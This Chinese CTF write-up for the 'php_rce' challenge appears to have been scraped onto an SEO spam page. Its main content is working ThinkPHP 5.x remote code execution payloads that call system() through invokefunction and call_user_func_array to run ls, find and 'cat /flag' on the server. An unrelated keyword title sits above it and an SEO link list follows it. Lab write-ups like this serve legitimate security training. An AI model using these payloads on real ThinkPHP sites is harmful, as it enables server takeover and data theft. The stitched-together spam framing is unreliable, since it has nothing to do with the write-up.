当前位置: 首页 > news >正文

cms做网站不用后端seo哪个软件好

cms做网站不用后端,seo哪个软件好,织梦学校网站,佛山顺德容桂做网站的公司背景知识 Linux命令 thinkPHPv5漏洞 题目 打开页面,页面显示为thinkphp v5的界面,可以判断框架为thinkPHP,可以去网上查找相关的漏洞 由题目可知,php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式 因为不知道是php版…

背景知识

        Linux命令

        thinkPHPv5漏洞

题目

 打开页面,页面显示为thinkphp v5的界面,可以判断框架为thinkPHP,可以去网上查找相关的漏洞

由题目可知,php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式

因为不知道是php版本几,先尝试一下

使用thinkPHP 5.1的漏洞

payload

 /?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

提示为5.0.2版本

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

 说明命令执行成功

接着抓取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

由页面提示可知,flag储存在flag文件下的flag文件中

用cat命令读取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 得到flag

参考学习链接:

攻防世界-web篇(php_rce)详解_渗透小剑客的博客-CSDN博客

https://www.cnblogs.com/qiushuo/p/17454519.html

http://www.tj-hxxt.cn/news/127840.html

相关文章:

  • 开发一个定制的网站网站seo属于什么专业
  • 网站建设客户调研表外贸推广平台怎么做
  • ctcms做的比较好的网站深圳纯手工seo
  • 我做推广找不到我的网站武汉网站建设公司
  • 青海中小企业网站建设bt磁力狗
  • 个人网站设计论文道客巴巴网站推广优化方式
  • 装饰公司 网站模板营销网络建设
  • 政务服务网办理营业执照seo算法
  • 大兴模版网站开发公司哪家好百度网盟官网
  • 好的响应式网站网站优化排名推荐
  • 泰安约吧排名优化网站
  • java做视频网站百度一下百度首页官网
  • 建筑工程网上竣工验收入口北京网站优化技术
  • wordpress 手机端优化优化一个网站需要多少钱
  • wordpress 更换语言包郑州seo外包平台
  • 贸易类文章网站网站是怎么做的
  • 怎样做校园网站seo查询 站长之家
  • vs2015做网站如何添加控件seo排名
  • 个人blog网站开发深圳搜索优化排名
  • 长春站是火车站还是高铁站网络营销推广方式案例
  • 基金公司网站建设方案手机制作网页用什么软件
  • 自己做网站怎么上传到网上十大最靠谱培训机构
  • 深圳网站建站建设博客推广的方法与技巧
  • 深圳外贸业务员工资百度关键词优化手段
  • 网站建设怎么配置伪静态文件seo运营做什么
  • 做再生料的网站友情链接免费发布平台
  • 手机网站建设哪站长工具seo排名
  • 交易猫假网站制作福州网络营销推广公司
  • wordpress外贸营销插件临沂网站seo
  • 企业 cms优化快速排名公司